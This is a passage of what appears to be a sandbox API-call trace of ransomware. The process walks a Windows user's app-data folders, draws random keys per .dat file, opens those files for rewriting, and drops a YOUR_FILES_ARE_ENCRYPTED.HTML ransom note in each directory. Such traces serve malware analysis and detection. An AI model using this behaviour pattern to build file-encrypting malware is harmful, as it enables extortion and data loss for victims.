returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509" [0118.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\*" [0118.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a33918c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9a33918c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.822] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a33918c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9a33918c, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.822] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7af4a068, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7af4a068, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7af70297, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x7702, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613044395", cAlternateFileName="161304~1")) returned 1 [0118.822] StrStrIW (lpFirst="1613044395", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.822] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\1613044395") returned 163 [0118.822] PathFindExtensionW (pszPath="1613044395") returned="" [0118.822] lstrlenW (lpString="") returned 0 [0118.822] PathFindExtensionW (pszPath="1613044395") returned="" [0118.822] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a16f532, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e103036, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.823] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.823] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\eventbeacons.dat") returned 169 [0118.823] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.823] lstrlenW (lpString=".dat") returned 4 [0118.823] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.823] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.823] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.823] CloseHandle (hObject=0x338) returned 1 [0118.824] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a33918c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0ff597, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.824] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.824] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\imprbeacons.dat") returned 168 [0118.824] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.824] lstrlenW (lpString=".dat") returned 4 [0118.824] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.824] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.824] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.824] CloseHandle (hObject=0x338) returned 1 [0118.824] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770da6a8, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9a33918c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0ff597, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.825] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.825] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.825] GetProcessHeap () returned 0x600000 [0118.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\210509\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\210509\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.825] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.826] CloseHandle (hObject=0x214) returned 1 [0118.826] GetProcessHeap () returned 0x600000 [0118.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.826] GetProcessHeap () returned 0x600000 [0118.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.826] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x76f5cee9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="214513", cAlternateFileName="")) returned 1 [0118.826] StrStrIW (lpFirst="214513", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.826] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513") returned 152 [0118.826] GetProcessHeap () returned 0x600000 [0118.826] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.826] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513" [0118.827] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\*" [0118.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x76f5cee9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.827] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x76f5cee9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.827] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f5cee9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e02c2b9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.827] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.827] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\eventbeacons.dat") returned 169 [0118.827] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.827] lstrlenW (lpString=".dat") returned 4 [0118.827] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.827] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.827] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.827] CloseHandle (hObject=0x338) returned 1 [0118.827] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f5cee9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0274b9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.827] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.828] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\imprbeacons.dat") returned 168 [0118.828] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.828] lstrlenW (lpString=".dat") returned 4 [0118.828] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.828] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.828] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.828] CloseHandle (hObject=0x338) returned 1 [0118.828] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f5cee9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e0274b9, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.828] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.828] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.828] GetProcessHeap () returned 0x600000 [0118.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\214513\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\214513\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.830] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.831] CloseHandle (hObject=0x214) returned 1 [0118.831] GetProcessHeap () returned 0x600000 [0118.831] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.831] GetProcessHeap () returned 0x600000 [0118.831] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.831] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f5cee9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x76f5cee9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="214513", cAlternateFileName="")) returned 0 [0118.831] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.831] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 175 [0118.831] GetProcessHeap () returned 0x600000 [0118.831] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.832] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0118.833] CloseHandle (hObject=0x320) returned 1 [0118.833] GetProcessHeap () returned 0x600000 [0118.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.833] GetProcessHeap () returned 0x600000 [0118.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0118.835] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x773af2d3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x773af2d3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="Creatives", cAlternateFileName="CREATI~1")) returned 0 [0118.835] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.835] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 165 [0118.835] GetProcessHeap () returned 0x600000 [0118.835] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.836] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.837] CloseHandle (hObject=0x32c) returned 1 [0118.837] GetProcessHeap () returned 0x600000 [0118.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.837] GetProcessHeap () returned 0x600000 [0118.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.838] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7480620a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="StagedAssets", cAlternateFileName="STAGED~1")) returned 1 [0118.838] StrStrIW (lpFirst="StagedAssets", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.838] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets") returned 127 [0118.838] GetProcessHeap () returned 0x600000 [0118.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.838] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets" [0118.838] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets", lpString2="\\*" | out: 